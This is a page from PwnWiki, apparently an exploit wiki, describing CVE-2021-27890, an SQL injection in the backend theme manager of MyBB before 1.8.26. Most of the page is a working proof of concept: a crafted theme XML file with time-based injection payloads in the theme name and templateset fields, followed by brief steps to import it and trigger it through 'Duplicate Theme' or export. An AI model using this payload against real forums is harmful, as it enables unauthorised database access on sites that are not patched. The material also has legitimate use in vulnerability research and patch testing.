CVE-2021-27890 SQL Injection vulnerablity in MyBB theme managerment

From PwnWiki
Revision as of 14:18, 31 May 2021 by L0snight (talk | contribs) (Created page with "Click "Duplicate Theme", then capture the traffic, successfully implemented delayed injection (the injection will also exist in the export function)")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎ • ‎中文(台灣)‎

Affected Versions

< 1.8.26


Exploit

Import the constructed malicious xml in the backend theme manager 

<?xml version="1.0" encoding="UTF-8"?>
<theme name="1' and sleep(10) and '" version="1825">
<properties>
<templateset>-2' or sleep(0.01) or '</templateset>
<editortheme><![CDATA[mybb.css]]></editortheme>
<imgdir><![CDATA[images]]></imgdir>
<logo><![CDATA[images/logo.png]]></logo>
<tablespace><![CDATA[5]]></tablespace>
<borderwidth><![CDATA[0]]></borderwidth>
<color><![CDATA[]]></color>
<disporder><![CDATA[a:7:{s:10:"global.css";i:1;s:10:"usercp.css";i:2;s:9:"modcp.css";i:3;s:16:"star_ratings.css";i:4;s:14:"showthread.css";i:5;s:17:"thread_status.css";i:6;s:8:"css3.css";i:7;}]]></disporder>
</properties>
<stylesheets>
</stylesheets>
<templates>
</templates>
</theme>

Click "Duplicate Theme", then capture the traffic, successfully implemented delayed injection (the injection will also exist in the export function)

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-27890_MyBB後台論壇主題管理SQL注入漏洞/en&oldid=3786"